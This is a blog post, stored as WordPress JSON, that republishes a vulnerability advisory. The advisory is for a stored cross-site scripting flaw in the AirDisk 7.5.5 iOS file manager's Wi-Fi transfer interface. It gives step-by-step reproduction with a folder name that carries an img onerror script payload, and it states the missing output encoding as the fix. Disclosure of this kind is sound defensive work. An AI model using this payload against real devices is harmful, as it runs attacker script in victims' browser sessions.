{"id":30245,"date":"2022-09-09T22:21:37","date_gmt":"2022-09-09T18:21:37","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168320\/airdisk755-xss.txt"},"modified":"2022-09-11T12:20:14","modified_gmt":"2022-09-11T07:50:14","slug":"airdisk-7-5-5-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/airdisk-7-5-5-cross-site-scripting\/","title":{"rendered":"AirDisk 7.5.5 Cross Site Scripting"},"content":{"rendered":"<pre><code># Exploit Title: AirDisk 7.5.5 File Manager Stored XSS\r\n# Date: Sep 8, 2022\r\n# Exploit Author: Chokri Hammedi\r\n# Vendor Homepage: https:\/\/apps.apple.com\/us\/developer\/felix-yew\/id505904424\r\n# Software Link:\r\nhttps:\/\/apps.apple.com\/us\/app\/airdisk-file-manager\/id566530748\r\n# Version: 7.5.5\r\n# Tested on: iPhone iOS 15.6<\/code><\/pre>\n<p>1\/ Start the server in the app (File Transfer &gt; Wi-fi File Transfer)<\/p>\n<pre><code><\/code><\/pre>\n<p>2\/ Open a web browser<\/p>\n<pre><code><\/code><\/pre>\n<p>3\/ Enter the address shown in the app, e.g. http:\/\/192.168.1.187:8080<\/p>\n<pre><code><\/code><\/pre>\n<p>4\/ Create a folder with the name: rose'&#8221;&gt;&lt;img src=x<br \/>\nonerror=alert(document.location)&gt;<\/p>\n<pre><code><\/code><\/pre>\n<p>5\/ Refresh. The folder name is stored and written back into the file listing without HTML encoding, so the script runs when the page reloads; the web interface needs to HTML-encode file and folder names on output.<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: AirDisk 7.5.5 File Manager Stored XSS # Date: Sep 8, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https:\/\/apps.apple.com\/us\/developer\/felix-yew\/id505904424 # Software Link: https:\/\/apps.apple.com\/us\/app\/airdisk-file-manager\/id566530748 # Version: 7.5.5 # Tested on: iPhone ios 15.6 1\/ Starting the server ( File Transfer &gt; Wi-fi File Transfer ) 2\/ Go to browser 3\/ Enter the 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30245","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30245","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30245"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30245\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30245"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30245"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}